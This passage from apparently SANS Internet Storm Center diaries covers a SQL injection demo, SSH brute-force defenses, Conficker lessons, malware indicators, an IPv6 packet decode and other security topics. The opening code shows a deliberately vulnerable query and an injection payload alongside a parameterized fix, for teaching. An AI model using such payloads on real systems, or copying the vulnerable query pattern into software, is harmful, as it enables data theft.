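                     [("alice", "a-secret"), ("bob", "b-secret")])
    return conn


def find_user_unsafe(conn, name):
    # VULNERABLE: the input becomes part of the SQL statement itself.
    return conn.execute(f"SELECT name, secret FROM users WHERE name = '{name}'").fetchall()


def find_user_safe(conn, name):
    # Parameterized: the driver sends `name` as a value, never as SQL.
    return conn.execute("SELECT name, secret FROM users WHERE name = ?", (name,)).fetchall()


conn = make_demo_db()
payload = "nobody' OR '1'='1"
print(len(find_user_unsafe(conn, payload)))  # 2 (every row is returned)
print(len(find_user_safe(conn, payload)))    # 0 (no user has that literal name)
```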

Finally, let us know what other tools you use for SQL injection testing/exploitation; if we get more interesting submissions I'll compile a list of such tools.

--

Bojan

INFIGO IS

Digital Content on TV

With higher bandwidth to the home and IP-based TV, we can enjoy more dynamic content and have even more fun interacting with our TVs. Adobe announced today that the Flash player will be incorporated into system-on-a-chip products from Broadcom, Intel, NXP, Sigma Designs and Mediatek. TV sets based on these chipsets will be able to play FLV files in high definition and display rich web content as well.

My reaction to this is mixed. It's cool to have better entertainment systems that can play web content as well; we knew it would happen anyway. The security side of me just doesn't sit too well with this, though. What if there is a vulnerability in the TV software? Do I have to patch my TV as well? Last I checked, my TV doesn't run anti-virus; does that mean I will have to pay for and install AV on it too?

I hope the update function on these TVs works easily and automatically; otherwise we might be looking at millions of targets ready to join various botnets.

Providing Accurate Risk Assessments

As professionals in security we are constantly researching new technologies to keep our skills sharp. The Internet Storm Center was formed to help keep our peers aware of the fast-paced changes in vulnerabilities, patches, hacks, worms, Trojans and threats in general. When you have to brief management on a new threat, the following steps can help you provide an accurate risk assessment:

- State the threat in language that is easily understood. It is your job to decrypt the threat for your management team.

- Portray clearly and accurately what the threat could do and how it would possibly perform in your environment.

- Identify the number of assets which may be affected by the threat. What percentage of your total devices is vulnerable? (Servers, workstations, operating systems, Internet exposure)

- Identify the corrective measures that are available.

- Calculate the SLE (Single Loss Expectancy). What would a single occurrence of the threat cost the organization, in dollars?

- State how the remediation would lower the exposure to the organization and give a cost for those actions.

- Recalculate the SLE with projected remediation included.

- Provide status of the protection mechanisms already in place (anti-virus definitions, IPS signature detections, patching statistics).

- Then allow management to make an educated decision based on risk to the enterprise, not just the security event itself.
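The steps above use SLE without giving a formula. A common textbook definition (an assumption here, not something this diary states) is SLE = asset value × exposure factor, where the exposure factor is the fraction of the asset's value lost in one incident. A minimal Python sketch of the calculate / remediate / recalculate steps, with entirely hypothetical numbers:

```python
from dataclasses import dataclass


@dataclass
class Exposure:
    vulnerable_assets: int   # count of devices the threat can actually reach
    value_per_asset: float   # dollars per device (hardware, data, downtime, ...)
    exposure_factor: float   # fraction of each device's value lost per incident (0..1)

    def sle(self) -> float:
        """Single Loss Expectancy = asset value x exposure factor."""
        if not 0.0 <= self.exposure_factor <= 1.0:
            raise ValueError("exposure_factor must be between 0 and 1")
        return self.vulnerable_assets * self.value_per_asset * self.exposure_factor


def net_benefit(before: Exposure, after: Exposure, remediation_cost: float) -> float:
    """Loss avoided by remediating, minus what the remediation costs."""
    return before.sle() - after.sle() - remediation_cost


# Hypothetical example: 120 exposed workstations; after patching, 15 remain exposed.
before = Exposure(vulnerable_assets=120, value_per_asset=2000.0, exposure_factor=0.25)
after = Exposure(vulnerable_assets=15, value_per_asset=2000.0, exposure_factor=0.25)

if __name__ == "__main__":
    print(before.sle())                          # 60000.0
    print(after.sle())                           # 7500.0
    print(net_benefit(before, after, 18000.0))   # 34500.0
```

If you can also estimate how many times per year the threat would materialize (the annualized rate of occurrence), multiplying it by the SLE gives an annualized loss expectancy. That figure is often easier to compare against a yearly budget.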

By using this concrete methodology, we can lessen the influence of media hype and provide a professional, cost-based opinion to those best equipped to make enterprise decisions.


Twitter Packet Challenge Solution

Yesterday, I posted the packet below to my Twitter feed to test the packet-decoding skills of my followers (my Twitter feed is also replicated to Facebook).

Anyway, here is the "solution". I came across this packet while playing with scapy6, bored on a plane. I was doing some manual fuzzing between VMware systems I had set up (of course, Wi-Fi/Bluetooth was turned off :-) ).

This packet is "valid" in the sense that I believe it to be RFC compliant, even though it doesn't actually make "sense". I never managed to send the packet, as the VMware Linux system would kernel panic whenever I tried. It is a pretty simple IPv6 packet, with an IPv6 header and a Hop-by-Hop header. There is no payload and no higher-level protocol header. The Hop-by-Hop header has one option: Jumbo Payload. Jumbograms are used to send packets that are larger than 64k, but then again, there is nothing to prevent you from sending an empty packet with the option. So as a little joke, I thought it would be nice to see what various systems do if you tell them a huge empty packet is coming. Of course, it never left... but, well.

RFC 2675 actually covers issues like this. In this case, the first host/router receiving the packet should send an ICMPv6 Parameter Problem message with Code 0, provided it understands jumbograms.

I am waiting for a plane right now and maybe I will get to it later. (AirTran flights JAX-ATL-SFO... in case you want to re-book.)

60 00 00 00 00 00 00 40 FE 80 00 00 00 00 00 00

02 0C 29 FF FE 0C 44 6D FE 80 00 00 00 00 00 00

02 23 12 FF FE 53 F5 4F 3B 00 C2 04 00 00 00 00

6: IP Version 6

0 0: Traffic Class 0

0 00 00: Flow label 0

00 00: Payload length 0 (this is normal for Jumbo packets.)

00: Next header 0 (Hop-By-Hop)

40: Hop Limit 64 (Default)

Next come the two link-local IP addresses:

FE80::020C:29FF:FE0C:446D

FE80::0223:12FF:FE53:F54F

So the IPv6 header is "normal". Next, the Hop-by-Hop header:

3B: There is nothing after this header (Next header: No more headers)

00: Header extension length 0, i.e. the complete header is 8 bytes (the field counts 8-byte units beyond the first 8)

C2: We got a Jumbogram option here

04: total length of the option value, 4 bytes

00 00 00 00: The option value...

So this is a jumbogram header setting the packet size to 0.
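For readers who want to replay the decode, here is a short Python sketch that walks the same 48 bytes field by field. It uses only the standard struct and ipaddress modules. It handles only the case seen here (a Hop-by-Hop header directly after the IPv6 header) and does not apply RFC 2675's error checks.

```python
import ipaddress
import struct

# The tweeted packet, exactly as listed above.
PACKET_HEX = (
    "60 00 00 00 00 00 00 40 FE 80 00 00 00 00 00 00 "
    "02 0C 29 FF FE 0C 44 6D FE 80 00 00 00 00 00 00 "
    "02 23 12 FF FE 53 F5 4F 3B 00 C2 04 00 00 00 00"
)

JUMBO_PAYLOAD = 0xC2  # RFC 2675 Jumbo Payload option type
PAD1 = 0x00           # single-byte padding option, has no length field


def decode(packet: bytes) -> dict:
    # First 8 bytes of the fixed 40-byte header:
    # 4 bits version, 8 bits traffic class, 20 bits flow label, then the rest.
    word, payload_len, next_hdr, hop_limit = struct.unpack("!IHBB", packet[:8])
    info = {
        "version": word >> 28,
        "traffic_class": (word >> 20) & 0xFF,
        "flow_label": word & 0xFFFFF,
        "payload_length": payload_len,
        "next_header": next_hdr,
        "hop_limit": hop_limit,
        "src": str(ipaddress.IPv6Address(packet[8:24])),
        "dst": str(ipaddress.IPv6Address(packet[24:40])),
        "options": [],
    }
    if next_hdr != 0:  # only the Hop-by-Hop case (next header 0) is handled here
        return info
    # Hop-by-Hop header: next header, then length in 8-byte units not counting the first 8.
    info["hbh_next_header"] = packet[40]
    end = 40 + (packet[41] + 1) * 8
    i = 42
    while i < end:  # walk the type-length-value options
        opt_type = packet[i]
        if opt_type == PAD1:
            i += 1
            continue
        opt_len = packet[i + 1]
        value = packet[i + 2 : i + 2 + opt_len]
        info["options"].append((opt_type, value))
        if opt_type == JUMBO_PAYLOAD and opt_len == 4:
            info["jumbo_payload_length"] = struct.unpack("!I", value)[0]
        i += 2 + opt_len
    return info


if __name__ == "__main__":
    for key, val in decode(bytes.fromhex(PACKET_HEX)).items():
        print(f"{key}: {val}")
```

It reports a payload length of 0 together with a jumbo payload length of 0. Since RFC 2675 requires the jumbo length to exceed 65,535, that is exactly the combination a jumbogram-aware receiver should answer with a Parameter Problem message.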

An extra-credit question I added later: what make are the systems involved?

The addresses use the standard EUI-64 encoding. The MAC addresses are

00:0C:29:0C:44:6D

00:23:12:53:F5:4F

(don't forget to flip bit #7, the universal/local bit of the first byte, so 02 becomes 00, and to drop the FF:FE in the middle)

According to the OUI database (http://standards.ieee.org/regauth/oui/oui.txt), the systems are:

00:0C:29 -> VMware

00:23:12 -> Apple
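The same reverse-EUI-64 step can be done in a few lines of Python. This is a sketch: the two-entry OUI table below contains only the prefixes named above. A real tool would load the full IEEE list.

```python
import ipaddress

# Only the two prefixes from the lookup above; a real tool would parse the IEEE OUI list.
OUI = {"00:0C:29": "VMware", "00:23:12": "Apple"}


def mac_from_eui64(addr: str) -> str:
    """Recover the MAC address embedded in an EUI-64 based IPv6 interface ID."""
    iid = ipaddress.IPv6Address(addr).packed[8:]  # low 64 bits = interface ID
    if iid[3:5] != b"\xff\xfe":
        raise ValueError(f"{addr} does not carry an EUI-64 (FF:FE) interface ID")
    # Undo the universal/local bit flip (0x02 in the first byte), drop the FF:FE filler.
    mac = bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:8]
    return ":".join(f"{b:02X}" for b in mac)


def vendor(mac: str) -> str:
    return OUI.get(mac[:8].upper(), "unknown")


if __name__ == "__main__":
    for a in ("FE80::020C:29FF:FE0C:446D", "FE80::0223:12FF:FE53:F54F"):
        m = mac_from_eui64(a)
        print(a, "->", m, vendor(m))
```

Addresses built with privacy extensions or random interface IDs contain no FF:FE marker, which is why the function refuses them rather than guessing.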

Anyway, I thought it was fun to tweet a packet. Maybe we will get an IP tunnel over Twitter going one of these days. It is just hard with an MTU of 170 bytes.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute Twitter: twitter.com/johullrich


Internet Storm Center Podcast Episode Number Fourteen

Hey everyone, sorry it has taken so long to get around to recording another podcast episode! Enjoy!

-- Joel Esler http://www.joelesler.net


Guess what? SSH again!

Our DShield data shows that password guessing attacks against SSH keep going strong. As if this alone were not indication enough that somebody somewhere is collecting bots and making money, we also keep receiving reports and logs from ISC readers who got hit and missed, or even hit and sunk.

While I'm aware that ISC readers probably don't have to be told, let's nevertheless try again to get the word out: If you are running any SSH server open to the Internet, and your usernames and passwords aren't at least 8 characters or so, your box is either owned by now, or about to be. It doesn't matter one bit what sort of device it is - those who run these scans have proven to be equally apt at taking over a Cisco router as they are at subverting an iMac.

Countermeasures shown to help include:

- Filter (by IP) who can get to your SSH. Firewalls rule! Who can't get to your SSH can't brute-force your SSH.

- Reconfigure your SSH to only use password-protected SSH keys and not permit plain passwords anymore

- Use hard to guess usernames. Yes, usernames.

- Move your SSH off port 22 to some obscure corner of the port space

- Scan your own network to find out where you have SSH running before others do. You might be surprised ...

- Use "fail2ban", though this doesn't help a lot anymore against the distributed scans we see lately

- Educate your users to use good passwords. Yes, even those users who have proven to be immune to enlightenment.

- Watch your logs. It's a great way to learn. And knowing what the "daily noise" looks like is imperative to spot "oddities"
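For the "watch your logs" item, here is a minimal Python sketch that tallies failed SSH password attempts per source address and per username. It assumes OpenSSH's usual "Failed password for ..." syslog messages. The exact wording can vary with version and syslog configuration, so treat the regular expression as an assumption to check against your own logs.

```python
import re
import sys
from collections import Counter

# Matches OpenSSH messages such as
#   "Failed password for root from 203.0.113.7 port 40122 ssh2"
#   "Failed password for invalid user admin from 203.0.113.9 port 5512 ssh2"
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")


def summarize(lines):
    """Count failed password attempts per source address and per username."""
    by_ip, by_user = Counter(), Counter()
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            by_user[user] += 1
            by_ip[ip] += 1
    return by_ip, by_user


if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1], errors="replace") as f:
        by_ip, by_user = summarize(f)
    print("Top sources:", by_ip.most_common(10))
    print("Top usernames:", by_user.most_common(10))
```

Run it against your auth log (for example `/var/log/auth.log` on Debian/Ubuntu or `/var/log/secure` on Red Hat). The username list is a good quick check on whether "hard to guess usernames" would actually help on your systems.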

Best is a combination of several of the above. One university I know allows password-based SSH from a couple of known networks only, and insists on certificate-based SSH from all others. A reader, whose systems at a community college had kept getting hammered, had the following anecdote to share: "No matter how hard we try, users keep picking bad passwords. So we decided to give them difficult to guess usernames. If a user's ID is @455%userid, it doesn't matter much anymore how dumb his password is!"

Before you purists rush to the contact button at the top of our page: yes, we know that picking complicated usernames and moving SSH off port 22 are "security by obscurity" and not real security. But the fact is that they both help to thwart the rampant brute force attacks. Bulletproof is nice, but if it can't be had, good camouflage sure beats being a plum target!

Let us repeat: SSH password guessing break-ins happen daily. If you haven't taken this seriously so far, DO SO NOW.


Some conficker lessons learned

These are the lessons learned from a conficker outbreak at an academic campus. Thanks for writing in, Jason.

The outbreak was not due to a lack of patching. The vast majority of the machines compromised by the worm were managed machines that were in fact patched up to date (including the patch for MS08-067) and had actively maintained anti-virus software installed.

As a refresher, recall that conficker propagates via a number of methods:

- Removable media with auto-run.

- Leveraging the privileges of the currently logged in user.

- Exploiting un-patched vulnerabilities (MS08-067).

- Brute-forcing credentials.

While we cannot currently release all relevant details regarding the outbreak at the (name removed), we'd like to share a few of the lessons learned.

- Ensure that an average user's login does not allow them to mount resources on other workstations in the domain via RPC. (I.e. when Alice logs into her workstation, she cannot mount the Admin$ share on Bob's machine without being prompted for credentials.) Using the GPO [Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Access this computer from the network] to limit RPC logins to workstations can be very helpful in this regard. See: <http://technet.microsoft.com/en-us/library/cc740196.aspx>

- Disable Auto-Run on all machines. This can also be accomplished via GPO.

- Ensure that all anti-virus software is very up-to-date and is enabled to "On-Access" scan for both the reading and writing of files.

- Ensure that all machines are patched for MS08-067, including vendor managed machines.

- Ensure that all privileged accounts have strong passwords. Apparently conficker is smart enough to enumerate accounts with elevated privileges such as Domain Admins. We observed conficker attempting to brute-force unique domain admin accounts.

- Monitor for 445/TCP scanning, particularly off-subnet scanning.

- Force all users to utilize a proxy to access the web.
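The "monitor for 445/TCP scanning" advice can be sketched as a small Python filter. This assumes you can export connection records from firewall or flow logs as (source, destination, port) tuples. The /24 "home subnet" and both thresholds are hypothetical values to tune for your own network. Off-subnet targets get a lower threshold, in line with the advice to watch those in particular.

```python
import ipaddress
from collections import defaultdict


def flag_445_scanners(flows, prefix_len=24, total_threshold=50, off_subnet_threshold=10):
    """Flag sources contacting many distinct hosts on 445/TCP, weighting off-subnet targets.

    flows: iterable of (src_ip, dst_ip, dst_port) tuples, e.g. exported firewall or flow logs.
    """
    targets = defaultdict(set)
    for src, dst, dport in flows:
        if dport == 445:
            targets[src].add(dst)
    flagged = {}
    for src, dsts in targets.items():
        # Treat the source's own /prefix_len network as "local" (an assumption).
        home = ipaddress.ip_network(f"{src}/{prefix_len}", strict=False)
        off = sum(1 for d in dsts if ipaddress.ip_address(d) not in home)
        if len(dsts) >= total_threshold or off >= off_subnet_threshold:
            flagged[src] = {"targets": len(dsts), "off_subnet": off}
    return flagged
```

A workstation that suddenly talks SMB to a dozen machines outside its own subnet is rarely doing anything legitimate, which is why the sketch reports the off-subnet count separately.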

We have yet to find a single virus removal tool that catches all payloads dropped by conficker. As usual, reinstalling an infected system is the only way to ensure a return to a trusted platform. Hopefully this information is useful to you and will help you limit any outbreaks of conficker that may appear on your campus.

Cheers,

Adrien de Beaupré

Intru-shun.ca Inc.




Strange Windows Event Log entry

Checking our Big Brother monitor, we noticed some Security Event Log entries that seemed to indicate someone was knocking on the door, which is usually not very strange. The strange part came when the same workstation name (Name = "lQPxf2ISQgEV1bGK") was presented from several different IP addresses.

Event log entry example from Windows 2003 (IP changed to protect the ..)

security: failure - 2009/04/16 10:32:10 - Security (529) - NT AUTHORITY_SYSTEM

"Logon Failure: Reason: Unknown user name or bad password User Name: Domain: WORKGROUP Logon Type: 3 Logon Process: NtLmSsp Authentication Package: NTLM Workstation Name: lQPxf2ISQgEV1bGK Caller User Name: - Caller Domain: - Caller Logon ID: - Caller Process ID: - Transited Services: - Source Network Address: 192.168.163.101 Source Port: 0"

-----

2008:

security: failure - 2009/04/16 10:31:44 - Microsoft-Windows-Security-Auditing (4625) - n/a

"The description for Event ID ( 4625 ) in Source ( Microsoft-Windows-Security-Auditing ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description_ see Help and Support for details. The following information is part of the event: S-1-0-0_ -_ -_ 0x0_ S-1-0-0_ _ WORKGROUP_ 0xc000006d_ %%2313_ 0xc0000064_ 3_ NtLmSsp _ NTLM_ lQPxf2ISQgEV1bGK_ -_ -_ 0_ 0x0_ -_ 192.168.163.101_ 1413."

This was repeated a few times, but with different source addresses.

Further searching on Google for the strange workstation name brings up other hits with the same name... none of which answer my question, as it seems no one has yet tied the name to different IP addresses (perhaps they were visited from only one source). I first noticed this strange name at the beginning of March, but thought nothing of it, as it all came from the same source address and I assumed it really was the workstation name. It wasn't until recently that it appeared from several IPs at the same time. This event log entry appears on multiple (10-15) servers.
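To spot the pattern described above (one workstation name arriving from several source addresses), a minimal Python sketch can group failed-logon events by name. It assumes the event text is available in the Windows 2003 (event 529) style quoted above, with "Workstation Name:" and "Source Network Address:" labels. The 2008 (event 4625) text captured here lacks those labels and would need different parsing.

```python
import re
from collections import defaultdict

# Field labels as they appear in the Windows 2003 (event 529) text quoted above.
WORKSTATION = re.compile(r"Workstation\s+Name:\s*(\S+)")
SOURCE = re.compile(r"Source\s+Network\s+Address:\s*(\S+)")


def names_from_many_sources(events):
    """Map each workstation name seen from more than one source IP to those IPs."""
    seen = defaultdict(set)
    for text in events:
        ws, src = WORKSTATION.search(text), SOURCE.search(text)
        if ws and src:
            seen[ws.group(1)].add(src.group(1))
    return {name: sorted(ips) for name, ips in seen.items() if len(ips) > 1}
```

A legitimate machine name normally maps to one address (or a few, with DHCP). A name such as lQPxf2ISQgEV1bGK showing up from many hosts at once suggests the name is hard-coded in whatever is generating the logons.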

Hopefully an astute reader has already investigated or can share theories as to the source. Thanks Julian for writing in!

Update 1: Shawn writes:

Here is a copy of one of the event log entries that we saw during an incident in December involving a worm that spread via MS08-067 (not conficker). These entries were found in the event log, and I reasoned that they were a symptom of the Server service being "crashed" by the exploit. The malware called itself vmwareservice.exe and installed as a service, in c:\windows\system.

Update 2: Ed writes:

Regarding the recent diary post about the strange log entries, I can describe this in exacting detail. Just last week a customer was hit with new malware, which was a repackage of many different viruses, trojans, and bots. One of the spreading mechanisms used the same exploit as Conficker, and the strange client hostname you mention is the same one we see in our forensic examples.

The spreading mechanism does not assume vulnerability to MS08-067; it first attempts some brute force attacks before moving on to exploiting the vulnerability. It then drops malware onto the target system's disk, most notably a file called svhost.exe, which then executes as NETWORK SERVICE (as well as for each user who logs in, thanks to a registry autorun). This executable then begins scanning port 445 on the local subnet as well as on network addresses close to the local network's range, and uses the same exploit/infection method.

In all cases we see the same garbage host ID in the event log. Some of the relevant filenames in the malware we have seen are:

svhost.exe (MS08-067 exploiter and malware dropper)

sysdrv32.sys

[x]3.scr (same md5 hash as svhost.exe)

<numbers 1 through ~83>.scr (same md5 hash as svhost.exe)

stnetlib.dll (a downloader)
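Ed reports that the numbered .scr files share svhost.exe's MD5 hash, so grouping files by hash is a quick way to spot such copies during triage. Below is a minimal sketch using Python's hashlib. The directory you point it at is up to you, and MD5 is used only because that is the hash the report mentions.

```python
import hashlib
import os
import sys
from collections import defaultdict


def md5_of(path: str, chunk: int = 65536) -> str:
    """MD5 of a file, read in chunks so large files don't fill memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def duplicate_groups(root: str) -> dict:
    """Return {md5: [paths]} for every hash shared by two or more files under root."""
    groups = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                groups[md5_of(path)].append(path)
            except OSError:  # locked or unreadable file: skip it
                continue
    return {h: sorted(paths) for h, paths in groups.items() if len(paths) > 1}


if __name__ == "__main__" and len(sys.argv) > 1:
    for digest, paths in duplicate_groups(sys.argv[1]).items():
        print(digest)
        for p in paths:
            print("   ", p)
```

On a live, possibly infected host the results can't be fully trusted, so running this against a mounted forensic image is the safer choice.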

Things to look for in logs are 445 connections bouncing off your internal firewall interfaces, outbound connection attempts on port 976 (IRC), and also outbound connection attempts on port 80 (I can't remember the IP address right now). We're not sure at the moment which malware came first (it's the chicken and egg syndrome), but forensics continues. McAfee and Symantec both have signatures for most (if not all) of these files now.

Cheers,

Adrien de Beaupré

Intru-shun.ca Inc.


Incident Response vs. Incident Handling

One of the things that comes up frequently in discussion is the difference between incident response and incident handling. Anyone who has had to deal with an incident has likely encountered this situation at least once. While you are trying to analyze what the #$%& happened, you always have senior executives and/or clients hanging over your shoulder, constantly bugging you for more details. The containment plan needs to be worked out, someone needs to liaise with Legal/HR/PR, management wants an update, the technical staff need direction or assistance, teams need to be coordinated, everyone wants to be in the loop, lots of yelling is going on, external IRTs want to know why your network is attacking theirs, nobody can locate the backups, someone has to keep track of activities and take notes, and the list goes on… No wonder people regularly burn out during incidents! Incident handling is obviously not a solo sport.

The best line for this problem came from the hot wash (post incident debrief) of a major exercise, where one of the leads stood up to the table of senior executives, and calmly explained "No, no you will NOT go talking to the team. You will talk to me. Only me. It is my job to keep you off their backs so they can do actual work".

That is the difference between Incident Response, and Incident Handling. Incident Response is all of the technical components required in order to analyze and contain an incident. Incident Handling is the logistics, communications, coordination, and planning functions needed in order to resolve an incident in a calm and efficient manner. Yes, there are people who can fulfill either role, but typically not at the same time. The worse things get, the greater the requirement for the two different roles becomes.

These two functions are best performed by at least two different people, although in larger-scale incidents this may need to be two leads who work closely together to coordinate the activities of two separate teams. In smaller environments, the incident team should ideally still be at least two people: one responding, and the other taking notes and communicating with stakeholders.

It should also be noted that the skill sets for these two roles are different as well. Incident response requires strong networking, log analysis, and forensics skills; incident handling requires strong communications and project management skills. These complementary roles allow the responders to respond, the team to work in a planned (or at least organized-chaos) fashion, and the rest of the world to feel that they have enough information to leave the team alone to work.

Thanks to a former colleague who helped me write this.

Thoughts or feedback?

Update: Rex wrote in the following: US workers in emergency services (fire, police, ambulance, first aid), are trained in the Incident Command System: http://en.wikipedia.org/wiki/Incident_Command_System

which defines a number of important roles in handling an emergency incident.

Small teams won't have enough members to put one person in each role. Experience shows that the "hands-on" members *must be left alone*, even if you need to do on-the-spot recruitment to handle PR, crowd control, logistics, etc. Another key concept is "one person in charge per function" - one commander, one PR person, one chief medic, etc.

Maybe the IT security incident response/handling world should steal good ideas from people who deal with life-and-death emergencies. Soon, IT emergencies will be life-and-death emergencies.

Cheers,

Adrien de Beaupré

Intru-shun.ca Inc.


2009 Data Breach Investigation Report

Verizon's annual Data Breach Investigation Report is out today. The study is based on data analyzed from 285 million compromised records from 90 confirmed breaches. The financial sector accounted for 93 percent of all such records compromised in 2008, and 90 percent of these records involved groups identified by law enforcement as engaged in organized crime. Because this study is based on actual case data from confirmed data breaches and not on surveys or questionnaires, the results are much more accurate and revealing.

This year’s key findings both support last year’s conclusions and provide new insights. These include:

• Most data breaches investigated were caused by external sources. Seventy-four percent of breaches resulted from external sources, while 32 percent were linked to business partners. Only 20 percent were caused by insiders, a finding that may be contrary to certain widely held beliefs. (The percentages add up to more than 100 because a single breach can involve more than one source.)

• Most breaches resulted from a combination of events rather than a single action. Sixty-four percent of breaches were attributed to hackers who used a combination of methods. In most successful breaches, the attacker exploited some mistake committed by the victim, hacked into the network, and installed malware on a system to collect data.

• In 69 percent of cases, the breach was discovered by third parties. The ability to detect a data breach when it occurs remains a huge stumbling block for most organizations. Whether the deficiency lies in technology or process, the result is the same. During the last five years, relatively few victims have discovered their own breaches.

• Nearly all records compromised in 2008 were from online assets. Despite widespread concern over desktops, mobile devices, portable media and the like, 99 percent of all breached records were compromised from servers and applications.

• Roughly 20 percent of 2008 cases involved more than one breach. Multiple distinct entities or locations were individually compromised as part of a single case, and remarkably, half of the breaches consisted of interrelated incidents often caused by the same individuals.

• Being PCI-compliant is critically important. Eighty-one percent of affected organizations subject to the Payment Card Industry Data Security Standard (PCI-DSS) had been found non-compliant prior to being breached.

The 2009 study shows that simple actions, when done diligently and continually, can reap big benefits. Based on the combined findings of nearly 600 breaches involving more than a half-billion compromised records from 2004 to 2008, the team conducting the study recommends:

• Change Default Credentials. More criminals breached corporate assets through default credentials than any other single method in 2008. Therefore, it’s important to change user names and passwords on a regular basis, and to make sure any third-party vendors do so as well.

• Avoid Shared Credentials. Along with changing default credentials, organizations should ensure that passwords are unique and not shared among users or used on different systems. This was especially problematic for assets managed by a third party.

• Review User Accounts. Years of experience suggest that organizations review user accounts on a regular basis. The review should consist of a formal process to confirm that active accounts are valid, necessary, properly configured and given appropriate privileges.

• Employ Application Testing and Code Review. SQL injection attacks, cross-site scripting, authentication bypass and exploitation of session variables contributed to nearly half of the cases investigated that involved hacking. Web application testing has never been more important.

• Patch Comprehensively. All of the vulnerabilities that hacking and malware exploited to compromise data were six months old or older, meaning that patching quickly isn't the answer, but patching completely and diligently is.

• Assure HR Uses Effective Termination Procedures. The credentials of recently terminated employees were used to carry out security compromises in several of the insider cases this year. Businesses should make sure formal and comprehensive employee-termination procedures are in place for disabling user accounts and removing all access permissions.

• Enable Application Logs and Monitor. Attacks are moving up the computing stack to the application layer. Organizations should have a standard log-review policy that extends beyond network, operating system and firewall logs to include remote access services, Web applications, databases and other critical applications.

• Define “Suspicious” and “Anomalous” (then look for whatever “it” is). Increasingly targeted and sophisticated attacks are often aimed at organizations storing large quantities of data valued by the criminal community. Organizations should be prepared to defend against and detect very determined, well-funded, skilled and targeted attacks.

Marcus H. Sachs

Director, SANS Internet Storm Center


Keeping your (digital) archive

Steve posted a link to a story about NASA's effort to read a bunch of tapes from the 60s:

http://www.latimes.com/news/nationworld/nation/la-na-lunar22-2009mar22,0,1783495,full.story

The story is about the effort and cost needed to read tapes from unmanned space missions that, among other things, mapped the surface of the Moon, and about the difficulty of finding (and restoring) a tape drive for the tapes they used back then.

Are we today doing better with our (digital) archive than NASA did?

- CDs/DVDs: sure, the drives are common, but will they remain so? What about CD-rot? How long will the discs actually remain readable, especially the writable ones?

- Blu-ray: will it become a big success and still be around in X years?

- Tapes: a breed already on the path to extinction? What about backward compatibility? How long do tapes actually remain readable?

- Hard disks are cheap! Same questions here: how long can they be kept in working order? What if the interface changes? (Will the drive from a decade-old PC actually work in a modern PC? What about one 20 years old?)

- File formats: EBCDIC and ASCII will last a long while, but if you need to express more than English they become rather limited. What about Office: what if Microsoft no longer makes it, or no longer exists, in X years? What if PDF is no longer the preferred interchange format at some point?

After all, who can edit a 20-year-old WordPerfect document today?

- Online services (e.g. storing it in a Gmail mailbox) are possibly even trickier (what if Google ...)

- ...

If you take small steps, it can all grow with you: you buy a new technology to store the data on while the old media and formats are still readable.

But big steps are far more trouble than small ones.

So how can you make it work for your archives:

- At the computer science department where I worked many years ago, every year we read 1/3 of the archive (which was on tape) and converted it to new media (being a Unix shop, there was little need to convert formats, but it was taken into account for e.g. FrameMaker versions), so the media in the archive were kept in two copies, both at most 3 years old.

I saw stacks of 1/2-inch tape reduced to a few Exabyte tapes. And on the next run, the Exabyte tapes were of a higher density ...

3 years might seem short, as media do last longer, but there is a safety factor to consider.

- Use multiple formats for every item: don't just bet on .doc (or .docx), OpenOffice, .pdf or even a collection of TIFF files; bet on all of them at the same time. Keep them all. Even that image could, in the worst case, be fed into OCR to get to a new format if it really has to be done.

Make sure to also archive a computer system that can edit the data. This is sometimes critical, especially with proprietary data formats.

Make sure to also convert to the latest versions of the formats, in addition to keeping the original, so that you have a better chance of compatibility with future products.

- Archive complete machines when needed. Archiving hardware is tricky, since it's the part that breaks with old age ... But you can virtualize the machine. Say you keep an old accounting system, for which you long since lost vendor support, in a VMware image that you never run, but only clone and consult as/when needed (wiping the clone after every use). Then you can keep running it for a long while, even after the hardware is long obsolete and the OS is long since unsupported and no longer safe to run on your normal network, while still keeping the proprietary data accessible.

- Have a policy in place to not let hardware support expire before all the archive is updated away from the technology.

- Roseman wrote in to remind us to keep the archive in multiple locations, not just one.

- ...
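The one-third-per-year rotation described above can be sketched in Python. This is a hypothetical helper, not the department's actual tooling. It assumes the archive is described by a manifest that maps each file to a SHA-256 checksum recorded when the file was written. Each year it picks the slice that is due and reports files that no longer read back correctly; those need restoring from the second copy before migrating to new media.

```python
import hashlib


def due_this_year(items, year: int, cycle: int = 3) -> list:
    """The slice of the archive to read back and migrate this year (each item every `cycle` years)."""
    ordered = sorted(items)
    return [item for i, item in enumerate(ordered) if i % cycle == year % cycle]


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(1 << 16), b""):
            h.update(block)
    return h.hexdigest()


def verify(manifest: dict, year: int, cycle: int = 3) -> list:
    """manifest maps file path -> expected SHA-256; returns the due paths that failed."""
    failed = []
    for path in due_this_year(manifest, year, cycle):
        try:
            ok = sha256_file(path) == manifest[path]
        except OSError:  # unreadable or missing media counts as a failure
            ok = False
        if not ok:
            failed.append(path)
    return failed
```

Over any `cycle` consecutive years every item comes up exactly once, which is what keeps every copy at most `cycle` years old.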

Other success stories ? Send them in via the contact page!

Before you ask what this has to do with security: It's all about availability!

--

Swa Frantzen -- Section 66


Oracle quarterly patches

Oracle also released their quarterly load of patches today.

In total 43 vulnerabilities were fixed.

See http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html

It contains CVSS ratings (risk matrices in Oracle lingo) and the parameters used for all vulnerabilities fixed.

One needs a MetaLink account to get further details.
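If you want to check or re-derive a score from the parameters in a risk matrix, here is a minimal Python sketch of the CVSS version 2 base equation. It assumes the matrices list CVSS v2 base metrics (access vector, access complexity, authentication, and confidentiality/integrity/availability impact); check the matrix headers before relying on it. The weights are the constants from the CVSS v2 specification.

```python
from decimal import Decimal, ROUND_HALF_UP

# CVSS version 2 base metric weights.
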